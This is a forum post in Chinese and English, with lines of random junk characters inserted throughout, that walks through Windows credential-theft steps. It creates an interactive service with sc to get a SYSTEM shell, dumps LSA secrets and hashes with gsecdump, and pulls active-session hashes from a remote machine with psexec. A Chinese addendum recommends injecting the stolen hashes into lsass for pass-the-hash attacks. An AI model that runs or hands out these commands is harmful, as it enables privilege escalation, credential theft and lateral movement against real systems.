o get a DOS Prompt as NT system:2 q/ [2 Q ?/ h7 Y3 O
! h+ R3 U8 i9 q' ?6 D9 fC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact9 C; R' S2 m+ t" D
[SC] CreateService SUCCESS
8 w7 p/ D& a, }* p& @/ L0 h
* y3 w; A4 k6 N% ^6 xC:\>sc start shellcmdline
* W+ q2 ~- C9 V[SC] StartService FAILED 1053:
, ~$ r0 Z) s" M8 B4 i9 r& g$ X" z4 l" u2 w# a, x
The service did not respond to the start or control request in a timely fashion.8 R' m# c/ k/ S% h# ~
0 k' t& t4 f0 A1 P3 E! h/ j5 X0 KC:\>sc delete shellcmdline
/ T! N' R6 I/ @# y. Z2 O[SC] DeleteService SUCCESS
" r) C& ^4 h t8 f0 w1 h9 U
1 p! W! c" N* }( Z------------. [1 }& v; z' r8 L) w9 O
5 F! Z5 |- j7 ]# e M
Then in the new DOS window:
6 ~' Z+ B1 r6 }" i, g
( f7 m _8 |" K% j. g+ ?0 bMicrosoft Windows XP [Version 5.1.2600]
7 E4 l9 P8 [) _( ?6 S(C) Copyright 1985-2001 Microsoft Corp.
5 V3 A" T) t. B. c) b
5 O4 D. G: R J9 }/ E! b0 sC:\WINDOWS\system32>whoami2 p, o4 w( y2 ?$ d! n9 @' w
NT AUTHORITY\SYSTEM5 z# s' W) R* d* B0 E- e
5 D0 J0 }" b) d0 ?0 j' d
C:\WINDOWS\system32>gsecdump -h; j- L$ S: f: j( M) [6 {
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se), i. d* P; p1 T! {- _ ~' z- c5 E* }' I
usage: gsecdump [options]8 |1 r6 J8 E" S$ z/ U
7 [/ X" m0 ~* N
options:7 Z4 E/ x6 I6 [$ x0 @5 o
-h [ --help ] show help% I# n- T+ J% R8 s- D' i! n" I
-a [ --dump_all ] dump all secrets
0 c; S: z3 w6 Y: V( h-l [ --dump_lsa ] dump lsa secrets
$ x: B9 M4 [" f/ x* y! ]-w [ --dump_wireless ] dump microsoft wireless connections
0 g& h/ a6 R# T5 E9 a8 D' O: P-u [ --dump_usedhashes ] dump hashes from active logon sessions7 t3 K3 L' u! f) b
-s [ --dump_hashes ] dump hashes from SAM/AD
9 @1 d2 ] k8 V, Q0 D3 g, x: x% d* Y- l4 n/ W9 o; b
Although I like to use:
, R% c: ], ^, H# c# ], k0 P S/ N
' y9 o/ ]. d" oPsExec v1.83 - Execute processes remotely
}! Q9 a L& K- ]Copyright (C) 2001-2007 Mark Russinovich1 ~" M+ W4 g9 h1 z0 h% x) e' s7 L
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
( ]: d) v% [3 X6 y$ n7 p$ |0 G: }& T) y5 W5 j% h
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
7 O2 y- }# o/ z1 y) H
, D( y% q4 }0 P6 C# kto get the hashes from active logon sessions of a remote system.
' p! R8 z5 s9 v' O" w U0 o7 H& }
0 [/ a* Z0 p- N& m5 qThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
& E3 [9 h; {" V' Z* r" y# C& L5 k! y# y- B
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
# ], {* s+ d& t* e. Z原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
9 J5 M; n4 r; B% U, y- t6 Q) i8 q( \1 A k# w) j
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。% S/ L" x. s, R( s( ~" y
|
发表于 2012-11-6 21:09:29
收藏
支持
反对